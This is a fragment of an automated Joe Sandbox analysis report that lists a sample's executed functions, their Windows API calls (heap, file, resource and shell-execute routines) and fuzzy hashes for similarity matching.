API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
String ID:
API String ID: 1272335518-0
Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98

Function 0040A96C Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderLocation.SHELL32(00000000,00948F58,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
wcslen.MSVCRT ref: 0040A99A
CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5

Function 00402022 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 004020A7
GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6

Strings

open, xrefs: 0040207E, 00402083, 0040208B

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CodeExecuteExitProcessShell
String ID: open
API String ID: 1016612177-2758837156
Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96

Function 00401B8F Relevance: 4.7, APIs: 3, Instructions: 233
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
String ID:
API String ID: 983379767-0
Opcode ID: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
Opcode Fuzzy Hash: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE

Function 0040B020 Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B092

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6

Function 0040DEC0 Relevance: 4.6, APIs: 3, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9
RtlReAllocateHeap.NTDLL(00940000,00000000,?,?), ref: 0040DF1C

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94

Function 0040A6C5 Relevance: 4.5, APIs: 3, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 0040A6E3
wcslen.MSVCRT ref: 0040A6F5
CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A

Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00408DFB
InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
CoInitialize.OLE32(00000000), ref: 00408E1D

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CommonControlsInitInitializememset
String ID:
API String ID: 2179856907-0
Opcode ID: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
Instruction ID: d18f3e268914b4fee2ab689e9e6bda8f6ab82eec5aee9dd7765ec6ce908ab83c
Opcode Fuzzy Hash: 91c7401402fa2f0ea5928b71181181df8ef358baa4c0a6ad788b24867e7e8746
Instruction Fuzzy Hash: 12E08CB088430CBBEB009BD0DC0EF8DBB7CEB00315F0041A4F904A2280EBB466488B95

Function 0040ADC0 Relevance: 3.1, APIs: 2, Instructions: 65
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040D498: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D4A3
Part of subcall function 0040D498: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040ADD5,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D51E

CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040ADF3
HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AE15

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CriticalSection$AllocCreateEnterFileHeapLeave
String ID:
API String ID: 3705299215-0
Opcode ID: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
Instruction ID: 12139a0eb1477c71ece9156acb4b07c5ee84e209973367f4cf7a68f803bf58ce
Opcode Fuzzy Hash: e305dac00e43d1f01632c500e63f0068ba79cd60e0177f680cb6723e5d67acda
Instruction Fuzzy Hash: C1119331140300ABC2305F1AEC44B57BBF9EB85764F14863EF5A5A73E0C7759C158BA9

Function 0040DBCA Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DD1D: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DBDB,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040DD5E

RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
memset.MSVCRT ref: 0040DC35

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
Instruction ID: c1bdd2e89517895a38d7a8cc2bcc280f97e8981c2924b00dcd90f9207400bfe8
Opcode Fuzzy Hash: 5a98dcc60eb41190d4dd3f8e51887e861c9e07386c3483abd70395c86239bf10
Instruction Fuzzy Hash: E51167729043149BC320DF59DC80A8BBBE8EF88B10F01492EB988A7351D774E804CBA5

Function 0040DE30 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47

Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(00940000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(00940000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C

Function 0040A7B9 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,00948F58,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
DeleteFileW.KERNELBASE(00000000,0040A7F2,00948F58,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A

Function 0040A9D0 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040AA13
CloseHandle.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040AA1B

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
Instruction ID: 9ff7f62518d4b0577bac71a3516b051fbd3d19e36237879e48dc57cbe5217eec
Opcode Fuzzy Hash: 579ea7bb730054d1301fd9c1686cb7efab9d423d292c410d1af4f5f5553bf1d6
Instruction Fuzzy Hash: E0F05E32600200A7CA216B5AED05A8BBBB2EB85764B11853EF124314F5CB355860DB5D

Function 00402BFA Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1

GetShortPathNameW.KERNEL32(00948F58,00948F58,00002710), ref: 00402C34

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(00940000,00000000,?), ref: 0040DEF9

Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DF50: HeapFree.KERNEL32(00940000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
String ID:
API String ID: 192546213-0
Opcode ID: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
Opcode Fuzzy Hash: 1f36478916e75dc19802576b6717a84d5ffab4db83f33051ef68578c82d7535e
Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E

Function 0040AA40 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61

Function 00402BC1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657

Function 00409BA0 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768

Non-executed Functions

Function 004026B8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9

Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1

Part of subcall function 00409C80: memcpy.MSVCRT(?,00000000,00000000,?,?,00402705,00948F58,00948F58,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000), ref: 00409C90

